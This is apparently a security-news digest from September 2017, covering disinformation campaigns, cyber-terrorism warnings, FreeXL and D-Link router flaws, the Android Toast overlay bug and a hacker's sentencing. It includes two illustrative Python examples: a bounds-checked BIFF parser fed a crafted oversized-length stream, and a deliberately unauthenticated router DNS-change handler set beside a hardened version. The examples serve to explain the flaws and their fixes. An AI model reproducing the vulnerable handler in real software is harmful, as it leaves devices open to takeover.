Jun 15, 2017: Vulnerabilities found.
Jul 03, 2017: This advisory is written.
Sep 08, 2017: A public advisory is sent to security mailing lists.


DaaS is coming: disinformation as a service

11.9.2017 SecurityWorld BigBrother
Computational propaganda may soon move from politics into business.

Facebook has published the findings of an internal investigation that uncovered 470 fake accounts and pages tied to a Russian “troll farm” which, during the last US presidential election, bought 3,300 Facebook ads for roughly 100,000 dollars.

Facebook also identified 2,200 ads purchased from US accounts whose language was nonetheless set to Russian. All were political in nature and reached between 23 and 70 million users.

Behind the campaign, by all accounts, is a Russian company that, according to a two-year-old article in The New York Times, specialises in the “art of trolling”. It pays its employees according to their trolling ability and even provides English courses so that they appear more credible in the West.

The company formerly known as the Internet Research Agency (today operating under the names Glavset and Federal News Agency) reportedly runs sixteen propaganda websites and employs over two hundred editors. The man behind it is one Yevgeny Prigozhin, a businessman and restaurateur who, alongside his culinary skills, has thus begun offering, quite literally, disinformation as a service: DaaS.

The New York Times, together with the security firm FireEye, found that his companies created as many as thousands of “fake Americans” on the social network, attempting to influence election debate online. Welcome to the world of computational propaganda.

Such propaganda includes the use of automation, botnets, algorithms, big data and artificial intelligence to influence public opinion via the internet. It frequently attacks mainstream media, branding them as lying and untrustworthy, which ultimately erodes public trust in democratic institutions.

Defending against such propaganda is already difficult today, but according to experts it will become an even greater challenge in the near future, and disinformation can be expected to infiltrate multimedia content soon.

Developers at the University of Washington, for example, have already used AI to create a fake video in which former US president Barack Obama says things he never said. Researchers at Stanford, for their part, have developed a tool they call Face2Face that produces such fake videos in real time.

It is easy to imagine, for instance, phone calls or even video calls with fraudsters impersonating others, whether in journalism or in any other line of work.

Every action has its reaction, though, and it is likely that in the near future IT security will shift its focus from protecting information as such to protecting its truthfulness. And it is not just about politics: disinformation campaigns can hit business hard as well.

Imagine the situation in which, in politics, proponents of one ideology try to smear their opponents, transposed to commerce. A manufacturer, instead of praising the qualities of its own product A, would rather undermine the competition’s reputation by attacking product B.

Using Facebook analytics it could identify potential buyers of product B, build their psychological profiles and then target them with posts from fake users sharing fake news damaging precisely product B.

All of this could be handled by AI, capable of producing, for example, the aforementioned fake multimedia content, and on commission at that, as DaaS, disinformation as a service. Disinformation is becoming a new business. And not a small one.


A computer instead of a bomb. A cyber 9/11 looms, experts warn 16 years after the attacks
11.9.2017 ČT24 BigBrother
Since the New York attacks of 2001, terrorists’ tactics have changed. Computers are increasingly the weapon, and radical groups accordingly have their own hacking sections. Experts from an advisory body to the US president warn that a cyber attack on the scale of 9/11 is looming, one that could target critical infrastructure including power plants. And the United States, they say, is not prepared for it. The experts therefore call for dedicated communication networks and for the sharing of sensitive information between the government and private infrastructure operators.

The coordinated attacks in New York, on the Pentagon and in Pennsylvania, where the hijackers were overpowered by the plane’s passengers, claimed almost three thousand lives sixteen years ago. Behind the tragedy were radicals from Al-Qaeda, who have since urged their followers to further action with every approaching anniversary.
In recent years the so-called Islamic State (IS) has also been exploiting the fear of Americans and others, stepping up attacks in the West as it loses territory in the Middle East.

IS was the very first terrorist group to set up a dedicated hacking division. Hackers sympathetic to the radicals have already managed, among other things, to attack the social media of US Central Command (CENTCOM), seizing its Twitter and YouTube accounts.

Two years ago, ahead of the 9/11 anniversary, IS released a video in which it threatened the US with new attacks and showed members of its cyber division, including people nicknamed “Virus of Syria”, “Doctor ISIS” and “Hacker Aldmar”. IS-affiliated groups such as the Islamic Cyber Army and the Caliphate Hackers launched the hashtag “America Under Hacks” at the time.

Radical hackers are learning fast
The IS cyber unit was founded in 2014 by twenty-year-old Junaid Hussain, known as the hacker Trick, who grew up in Birmingham, England. Since then IS hackers have broken into the systems of US news stations, the Kuwaiti parliament, the websites of French municipalities, the International Business Times site and Newsweek’s Twitter account.

According to experts, these hackers are not yet complete professionals, but that may soon change. “They are definitely learning the technology. In the next five years they will be more capable and will try to carry out operations that could have catastrophic consequences, such as loss of life,” David Kennedy, a former US Marine and head of a cyber security consultancy, told Tech Insider.
So-called lone wolves, who are merely inspired by radical ideology and need not even be in contact with a terrorist group, pose a particular problem. “If you are sitting in an internet cafe in Mogadishu, you can do far more damage on the internet than you could with an AK-47 or a bomb,” the expert warned.

The threat of a major cyber strike is therefore growing. Not only government servers are at risk, but also banks, power plants, water distribution and transport systems. Hackers could in theory cause an explosion or a flood. Outdated systems are a problem too; in the US specifically they control many dams and factories, as well as oil pipelines and electricity distribution grids.

Hackers could, for example, “tell” a pipeline control system that the flow of oil had stopped, causing the automated operating systems to start pumping until an explosion occurred due to over-pressurisation.

Breaking into a nuclear power plant is not hard, an expert showed
Scott Lunsford of IBM’s security division successfully broke into a nuclear power plant’s systems as far back as 2007. “It turned out to be one of the easiest penetrations I have ever done. We got into the system on the very first day, and within a week we had complete control of the entire nuclear power plant,” the hacker said.

He was not able to make the reactor explode, which physical safety measures prevent, but he could have stopped the plant from supplying electricity to the surrounding area. Hackers could also cause a mass accident: as early as 2010, researchers at the University of Washington demonstrated that attackers can take control of a car’s key systems.

In May, US president Donald Trump signed an executive order directing that the US computer networks be strengthened and modernised, but according to experts that is not enough.

“There is a narrow window of opportunity before the watershed moment arrives, an attack on the scale of 9/11. The time to act is now. As a nation we must recognise the challenges in cyber security and begin taking meaningful steps to improve it, in order to prevent a large-scale cyber attack,” says the National Infrastructure Advisory Council (NIAC) in its latest report, which presents eleven recommendations intended to improve the situation.
One problem, for example, is that in the US most critical infrastructure is owned and operated by the private sector, which does not receive all the sensitive information about a potential threat from government sources.

The NIAC advisory body therefore calls on industrial companies to create an automated information-sharing mechanism. The government, the experts say, should in turn speed up the granting of security clearances to executives and declassify information on cyber threats.

According to the advisers, the United States should build separate communication networks to support critical infrastructure, isolated from the public internet. A wireless backup network should be created for emergency communication in the event of a nationwide cyber attack.

Cyber security should be overseen directly by the White House national security adviser, the experts believe.
They are also convinced that federal agencies should provide technological and financial support, particularly to small and medium-sized companies, for protection against attacks. The state should approve incentives that would allow companies to invest more in protective technologies.

A hacking attack could paralyse air traffic
That the next 9/11 may be caused by hackers taking control of aviation systems rather than by suicide bombers was a warning issued two years ago by Gabi Siboni, director of the cyber security programme at Israel’s Institute for National Security Studies.

“Hackers have begun targeting nuclear power plants and other critical operations around the world in a sustained effort to take control,” the expert said.

In the worst case, terrorist groups could disrupt and possibly penetrate the critical air traffic control infrastructure, halting flight systems and causing deadly accidents.

“Cyber aggression is widely used and has become a basic weapon in international conflicts. Countries are responsible for attacks on most national infrastructure, and governments in the Western world understand that they must allocate resources not only to buying new tanks and air-defence systems, but also to defensive cyber infrastructure.”
Gabi Siboni
Israeli cyber security expert
Cyber war is already raging between states
Cyber attacks are on the rise, and in many cases it has been more or less proven that national regimes were involved. It emerged, for example, that Iranian hackers took control of a six-metre-high dam near New York in 2013. Two years later the Iranian group SOBH Cyber Jihad claimed responsibility.

Hackers working on behalf of a foreign state also recently penetrated at least a dozen US power plants, including the Wolf Creek nuclear plant in Kansas, Bloomberg reported, citing informed US officials.

According to them, the attack raises the suspicion that the hackers are looking for weak points in the electricity distribution system. The main suspect in this case is Russia.

Last December, a power outage in the Ukrainian capital Kiev was caused by malware called Win32/Industroyer. Modified forms of this malware could, according to experts, attack other infrastructure as well. Ukraine blamed Russia for the attacks on its energy grids, but Russia denied responsibility.

Washington uses computers as a weapon too, although it has never officially confirmed, for instance, the strike against Iran’s Natanz nuclear facility. According to some experts, the Stuxnet virus slowed the Iranian nuclear programme there between 2009 and 2010.

The worm was able to reprogram automated systems and thereby put a thousand Iranian uranium-enrichment centrifuges out of operation.
In 2014, North Korean hackers for their part broke into the innards of Sony, most likely thanks to stolen administrator passwords. The White House at the time called the attack a national security threat. Sony ultimately decided not to release the film parody about an assassination of the head of communist North Korea.

The system’s vulnerability was also shown by the leaks from the Democratic Party headquarters before the US presidential election. US intelligence agencies claim that the campaign to smear Hillary Clinton and help Trump was ordered by the Kremlin.

Russian military intelligence (GRU) allegedly provided WikiLeaks with material obtained by hacking Democratic politicians. Moscow denied responsibility.

It responded the same way in June, when a leaked National Security Agency (NSA) report revealed that Russian hackers had attacked the server of at least one US voting-software supplier a few days before the election.


High Severity Flaws Patched in FreeXL Library

11.9.2017 securityweek  Vulnerebility
An update released last week for the FreeXL library patches a couple of high severity remote code execution vulnerabilities discovered by Marcin Noga, a Polish researcher working for Cisco Talos.

FreeXL is an open source C-based library that allows users to extract data from Microsoft Excel (.xls) spreadsheets. A FreeXL package is available for several Linux distributions.

Noga noticed that the read_biff_next_record and read_legacy_biff functions in FreeXL, which are related to the Binary Interchange File Format (BIFF), are affected by heap-based buffer overflow vulnerabilities. An attacker can exploit the flaws by getting the targeted user to open a specially crafted Excel file via an application that uses the FreeXL library.

“An attacker who sends a malicious XLS file, can use this to overwrite large parts of memory to crash the application or to execute arbitrary code by overwriting critical control flow structures,” Cisco said in a blog post.
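The page does not say which comparison FreeXL's record readers skipped, so the following is an added example (editor's code, not FreeXL's) of the structural check every BIFF reader has to make: a record is a 2-byte type and a 2-byte length followed by that many payload bytes, and the declared length must be compared against the bytes that actually remain before the payload is sliced or copied anywhere. The sample streams are constructed for the example; the record type numbers (BOF 0x0809, CODEPAGE 0x0042, EOF 0x000A) and the header layout are from the BIFF format.

```python
import struct
from typing import Iterator, List, Tuple

BOF, CODEPAGE, EOF = 0x0809, 0x0042, 0x000A   # record type ids from the BIFF spec


class MalformedBiff(ValueError):
    """Raised instead of reading past the end of the buffer."""


def iter_biff_records(data: bytes) -> Iterator[Tuple[int, int, bytes]]:
    """Walk a BIFF stream, yielding (offset, record_type, payload).

    Each record is a 4-byte header (uint16 LE type, uint16 LE payload length)
    followed by that many payload bytes. The declared length is checked against
    the bytes actually remaining before the payload is touched; skipping that
    comparison is exactly how a crafted length becomes an out-of-bounds read
    or, when the payload is copied into a fixed buffer, a heap overflow."""
    pos, end = 0, len(data)
    while pos < end:
        if end - pos < 4:
            raise MalformedBiff(f"truncated record header at offset {pos}")
        rtype, rlen = struct.unpack_from("<HH", data, pos)
        remaining = end - pos - 4
        if rlen > remaining:
            raise MalformedBiff(
                f"record 0x{rtype:04X} at offset {pos} declares {rlen} payload "
                f"bytes but only {remaining} remain")
        yield pos, rtype, data[pos + 4:pos + 4 + rlen]
        pos += 4 + rlen


def parse_bof(payload: bytes) -> Tuple[int, int]:
    """Return (biff_version, stream_type) from a BOF payload. The first two
    uint16 fields exist in every BIFF version, so anything shorter is rejected
    rather than read through."""
    if len(payload) < 4:
        raise MalformedBiff(f"BOF payload is {len(payload)} bytes, need at least 4")
    return struct.unpack_from("<HH", payload, 0)


def record_types(data: bytes) -> List[int]:
    """Record types in stream order; raises MalformedBiff on a bad length."""
    return [rtype for _, rtype, _ in iter_biff_records(data)]


def is_well_formed(data: bytes) -> bool:
    """True when every record's declared length fits inside the buffer."""
    try:
        for _ in iter_biff_records(data):
            pass
        return True
    except MalformedBiff:
        return False


def record(rtype: int, payload: bytes) -> bytes:
    """Build one record; used only to construct the sample streams below."""
    return struct.pack("<HH", rtype, len(payload)) + payload


# Constructed streams (not taken from any real .xls file): a BIFF8
# workbook-globals BOF, a CODEPAGE of 1200 (UTF-16LE), then EOF.
BOF_PAYLOAD = struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0, 0)
GOOD_STREAM = (record(BOF, BOF_PAYLOAD)
               + record(CODEPAGE, struct.pack("<H", 1200))
               + record(EOF, b""))

# Same stream, but the CODEPAGE header now claims 0xFFFF payload bytes while
# only 2 follow: the lie a reader must catch before copying.
CRAFTED_STREAM = (record(BOF, BOF_PAYLOAD)
                  + struct.pack("<HH", CODEPAGE, 0xFFFF) + struct.pack("<H", 1200)
                  + record(EOF, b""))


if __name__ == "__main__":
    print("good:", [hex(t) for t in record_types(GOOD_STREAM)])
    print("crafted well-formed?", is_well_formed(CRAFTED_STREAM))
```

In Python a bad slice just comes back short, so the explicit check is what turns a silent truncation into a rejected file; in C the same comparison is the difference between a rejected file and a memcpy past the end of the heap allocation.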

The flaws, tracked as CVE-2017-2923 and CVE-2017-2924, have been assigned a CVSS score of 8.8, which puts them in the high severity category. Cisco Talos has published technical advisories for both security holes.

The vulnerabilities were patched by FreeXL developers on September 7 with the release of version 1.0.4.

“Developers, system packagers and maintainers are warmly invited to quickly upgrade to FreeXL-1.0.4,” said FreeXL maintainer and developer Alessandro Furieri.

FreeXL vulnerabilities are uncommon, but not unheard of. Back in March 2015, a researcher discovered several flaws that could have been exploited for arbitrary code execution or denial-of-service (DoS) attacks by getting the targeted user to open a specially crafted file.


Facebook slapped with $1.43 million fine for violating users' privacy in Spain

11.9.2017 thehackernews Social

Facebook is once again in trouble regarding its users' privacy.
The social media giant has recently been heavily fined once again for a series of privacy violations in Spain.
Recently, Google also incurred a record-breaking fine of $2.7 billion (€2.42 billion) by the European antitrust officials for unfairly manipulating search results since at least 2008.
Now, the Spanish Data Protection Agency (AEPD) has issued a €1.2 Million (nearly $1.4 Million) fine against Facebook for breaching laws designed to protect its people's information and confidentiality.
According to the data protection watchdog, the social network collects its users' personal data without their 'unequivocal consent' and makes the profit by sharing the data with advertisers and marketers.
The AEPD also found Facebook collects sensitive data on user's ideology, religious beliefs, sex and personal tastes and navigation—either directly from its own services or through third parties—without clearly informing its users how this information would be used.
This activity constituted a "very serious" infringement of the country's local data protection law (LOPD), for which the authority fined the company €600,000 ($718,062).
The regulator also identified two "serious" violations of privacy laws, including:
Tracking people through the use of "Like" button social plug-ins embedded in other non-Facebook web pages—for which it is fined €300,000 ($359,049).
Failing to delete data collected from users once it has finished using it, in fact, the company "retains and reuses it later associated with the same user"—which resulted in another €300,000 ($359,049) fines.
The AEPD also said that Facebook's existing privacy policy contains "generic and unclear terms," and doesn't "adequately collect the consent of either its users or nonusers, which constitutes a serious infringement."
However, Facebook denied any wrongdoing and intended to appeal the decision of the Spanish data protection authority, providing the following statement.
"We take note of the DPA's decision with which we respectfully disagree. Whilst we value the opportunities we've had to engage with the DPA to reinforce how seriously we take the privacy of people who use Facebook, we intend to appeal this decision."
"As we made clear to the DPA, users choose which information they want to add to their profile and share with others, such as their religion. However, we do not use this information to target adverts to people."
In May, the social media giant was fined €150,000 ($179,532) by France’s data protection authority CNIL for the way it targeted advertising and tracked users.


Researcher Discloses 10 Zero-Day Flaws in D-Link 850L Wireless Routers

11.9.2017 thehackernews Vulnerebility

A security researcher has discovered not one or two but a total of ten critical zero-day vulnerabilities in routers from Taiwan-based networking equipment manufacturer D-Link which leave users open to cyber attacks.
D-Link DIR 850L wireless AC1200 dual-band gigabit cloud routers are vulnerable to 10 security issues, including "several trivial" cross-site scripting (XSS) flaws, lack of proper firmware protection, backdoor access, and command injection attacks resulting in root access.
If successfully exploited, these vulnerabilities could allow hackers to intercept connection, upload malicious firmware, and get root privileges, enabling them to remotely hijack and control affected routers, as well as network, leaving all connected devices vulnerable to cyber attacks as well.
These zero-day vulnerabilities were discovered by Pierre Kim—the same security researcher who last year discovered and reported multiple severe flaws in D-Link DWR-932B LTE router, but the company ignored the issues.
The same happened in February, when the researcher reported nine security flaws in D-Link products but disclosed the vulnerabilities citing a "very badly coordinated" disclosure with D-Link.
So, Kim opted to publicly disclose the details of these zero-day flaws this time and published their details without giving the Taiwan-based networking equipment maker the chance to fix them.
Here’s the list of the 10 zero-day vulnerabilities Kim discovered, which affect both D-Link 850L revision A and revision B:
Lack of proper firmware protection—since the protection of the firmware images is non-existent, an attacker could upload a new, malicious firmware version to the router. Firmware for D-Link 850L RevA has no protection at all, while firmware for D-Link 850L RevB is protected, but only with a hardcoded password.
Cross-site scripting (XSS) flaws—both the LAN and WAN interfaces of D-Link 850L RevA are vulnerable to "several trivial" XSS vulnerabilities, allowing an attacker "to use the XSS to target an authenticated user in order to steal the authentication cookies."
Retrieve admin passwords—both the LAN and WAN interfaces of D-Link 850L RevB are also vulnerable, allowing an attacker to retrieve the admin password and use the MyDLink cloud protocol to add the user's router to the attacker's account, gaining full access to the router.
Weak cloud protocol—this issue affects both D-Link 850L RevA and RevB. The MyDLink protocol works via a TCP tunnel that uses no encryption at all to protect communications between the victim's router and the MyDLink account.
Backdoor access—D-Link 850L RevB routers have backdoor access via Alphanetworks, allowing an attacker to get a root shell on the router.
Private keys hardcoded in the firmware—the private encryption keys are hardcoded in the firmware of both D-Link 850L RevA and RevB, allowing an attacker to extract them and perform man-in-the-middle (MitM) attacks.
No authentication check—this allows attackers to alter the DNS settings of a D-Link 850L RevA router via non-authenticated HTTP requests, forward the traffic to their own servers, and take control of the router.
Weak file permissions and credentials stored in cleartext—local files are exposed in both D-Link 850L RevA and RevB. In addition, the routers store credentials in clear text.
Pre-authentication RCEs as root—the internal DHCP client running on D-Link 850L RevB routers is vulnerable to several command injection attacks, allowing attackers to gain root access on the affected devices.
Denial of Service (DoS) bugs—allow attackers to remotely crash some daemons running in both D-Link 850L RevA and RevB via the LAN.
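The "no authentication check" item above is the kind of flaw that is easiest to see in code. The following is an added example, not D-Link's firmware or any code from Kim's advisory: it models a router admin endpoint that changes the LAN DNS servers, first as a handler that applies the change to any HTTP request, then as a hardened handler that requires a valid session cookie, a per-session CSRF token, a POST method, and syntactically valid, non-special IP addresses. The endpoint path `/dnscfg.cgi`, the `Request` and `RouterState` types, and the in-memory session store are all constructed for the illustration and do not correspond to the device's real interface.

```python
"""Constructed model of an unauthenticated-settings-change flaw and its fix.

Not vendor code; the endpoint name, request shape and session store are
assumptions made for the example.
"""
import hmac
import ipaddress
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (constructed)."""
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


@dataclass
class RouterState:
    """Router settings plus an in-memory session store (constructed)."""
    dns_servers: list = field(default_factory=lambda: ["192.168.0.1"])
    # session id -> CSRF token bound to that session
    sessions: dict = field(default_factory=dict)


def vulnerable_set_dns(req: Request, state: RouterState):
    """Models the flaw: the DNS change is applied without any check that
    the caller is an authenticated administrator."""
    if req.path == "/dnscfg.cgi" and req.form.get("dns1"):
        state.dns_servers = [req.form["dns1"]]
        return 200, "dns updated"
    return 404, "not found"


def create_session(state: RouterState):
    """Issue a session id and a CSRF token; in a real device this runs
    only after the admin password has been verified."""
    sid = secrets.token_urlsafe(32)
    csrf = secrets.token_urlsafe(32)
    state.sessions[sid] = csrf
    return sid, csrf


def _valid_dns_server(addr: str) -> bool:
    """Accept only a parseable unicast address (v4 or v6)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not (ip.is_multicast or ip.is_unspecified or ip.is_loopback)


def hardened_set_dns(req: Request, state: RouterState):
    """Same endpoint with the checks the vulnerable handler lacks:
    method, authenticated session, CSRF token, and input validation."""
    if req.path != "/dnscfg.cgi":
        return 404, "not found"
    if req.method != "POST":
        return 405, "method not allowed"
    sid = req.cookies.get("session")
    expected_csrf = state.sessions.get(sid) if sid else None
    if expected_csrf is None:
        return 401, "authentication required"
    # constant-time comparison so token checking does not leak timing
    if not hmac.compare_digest(req.form.get("csrf", ""), expected_csrf):
        return 403, "bad csrf token"
    servers = [req.form[k] for k in ("dns1", "dns2") if req.form.get(k)]
    if not servers or not all(_valid_dns_server(s) for s in servers):
        return 400, "invalid dns server"
    state.dns_servers = servers
    return 200, "dns updated"


if __name__ == "__main__":
    # Constructed request: unauthenticated GET pointing DNS at 203.0.113.5
    rogue = Request("GET", "/dnscfg.cgi", form={"dns1": "203.0.113.5"})
    weak = RouterState()
    print("vulnerable:", vulnerable_set_dns(rogue, weak), weak.dns_servers)
    strong = RouterState()
    print("hardened:", hardened_set_dns(rogue, strong), strong.dns_servers)
```

The session check is the one that closes the reported flaw; the CSRF token matters because the same request, if accepted on a bare cookie, could be triggered from a page the authenticated administrator happens to visit, which is the cross-site angle the XSS item on this list points at.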
Kim advised users to cut the connections with the affected D-Link router in order to be safe from such attacks.
According to Kim, "the Dlink 850L is a router overall badly designed with a lot of vulnerabilities. Basically, everything was pwned, from the LAN to the WAN. Even the custom MyDlink cloud protocol was abused."
You can get full details of all 10 zero-day vulnerabilities on Kim's website as well as on security mailing lists.
The security of D-Link products was recently called into question when the U.S. Federal Trade Commission (FTC) sued the company earlier this year, alleging that lax security left its products, and therefore "thousands of consumers," vulnerable to hackers.


"Toast" Vulnerability in Android Allowed for New Overlay Attacks

11.9.2017 securityweek Vulnerebility
One of the 81 vulnerabilities addressed in the September 2017 Android security bulletin is a High-risk issue that could be exploited to launch a new type of overlay attack, Palo Alto Networks reveals.

Tracked as CVE-2017-0752 and described as an elevation of privilege vulnerability in the Android framework (windowmanager), the bug abuses the “Toast” notifications in the operating system to modify what users see on the screen. Unlike similar overlay attacks, however, the new method does not require specific permissions or conditions to be effective, Palo Alto's security researchers have discovered.

All Android releases prior to Android 8.0 Oreo are at risk, but Palo Alto’s researchers say they are not aware of any active attacks against this particular vulnerability. To stay protected, users are advised to update their devices as soon as a patch becomes available for them.

“This type of attack can be used to give malicious software total control over the device. In a worst-case attack scenario, this vulnerability could be used to render the phone unusable or to install any kind of malware including (but not limited to) ransomware or information stealers,” the researchers note.

The attack works similarly to other overlay exploits, by drawing a window over other windows and applications running on the device. Thus, an attacker can trick the victim into believing they are clicking on one window when in reality they are clicking on another, where malware is installed or unwanted permissions (such as full device privileges) are granted.

While overlay attacks aren’t new and have been discussed before, it was a common misconception that malicious apps attempting such trickery would need to explicitly request the “draw on top” permission and would need to be installed from Google Play, Palo Alto says. The newly discovered vulnerability can be exploited without meeting these conditions, thus rendering overlay attacks a more serious threat than believed.

For that, an application would have to abuse the “Toast” window, an overlay type normally used to display a quick message (notification) over all other apps. The Toast window would allow a malicious application to write over the interface of another app without requesting the SYSTEM_ALERT_WINDOW privilege this typically requires.

An installed app that can craft an overlay using the Toast window can launch an attack without special permissions. The crafted overlay includes two types of views (normally embedded in a Toast window), one of which is clickable. If the attacker can lure the user into clicking the view, the attack is successful, the researchers point out.

What’s more, the permission check and operation check don’t apply to Toast windows either, meaning that an app is granted complete control over the TYPE_TOAST window. While Android 7.1 introduced mitigations by assigning a maximum timeout (3.5s) to each Toast window and not allowing apps to display more than one such window at a time, the fundamental cause of the vulnerability isn’t addressed, and an app still doesn’t need permissions to display a Toast window on top of other apps.

The security researchers also discovered that it is possible to continuously show a Toast window despite these mitigations, although that approach doesn’t allow the malicious app to monitor whether the user has clicked on the expected area in the overlay. Another approach would involve displaying an overlay to lure users to click on it, sleeping for several seconds, and then switching to another overlay.

The vulnerability was reported in May 2017 and Google included patches for it in the September 2017 Android security bulletin. Android 8.0 Oreo doesn’t inherit the vulnerability and all devices running this platform iteration are safe from overlay attacks, the security researchers say.


Man Sentenced to Prison for Hacking Accounts of U.S. Officials

11.9.2017 securityweek Crime
Justin G. Liverman, a 25-year-old from Morehead City, North Carolina, has been sentenced to prison for his role in a hacking conspiracy that targeted the online accounts of U.S. officials and their families.

Liverman, known online as “D3F4ULT,” admitted being a member of the Crackas With Attitude hacker group. In January, he pleaded guilty to conspiracy to commit unauthorized computer intrusions, identity theft, and phone harassment.

He was sentenced on Friday by a court in the Eastern District of Virginia to 5 years in prison. Another member of Crackas With Attitude, 23-year-old Andrew Otto Bogs, also of North Carolina, was sentenced to 2 years in prison in June for his role in the conspiracy.

Three other individuals believed to be members of the hacker group, including a 17-year-old boy, are from the United Kingdom and they are being prosecuted by local authorities.

Between October 2015 and February 2016, Crackas With Attitude used social engineering and other techniques to gain access to government systems, and the accounts of U.S. officials and their families. The group’s victims included CIA director John Brennan, U.S. spy chief James Clapper, and senior figures in the FBI, the DHS, the White House and other federal agencies.

The hackers leaked the victims’ personal details and harassed them over the phone. Liverman published documents and personal information obtained from one victim’s account, sent that victim threatening text messages, and used a “phonebombing” service that repeatedly called the victim with a threatening message.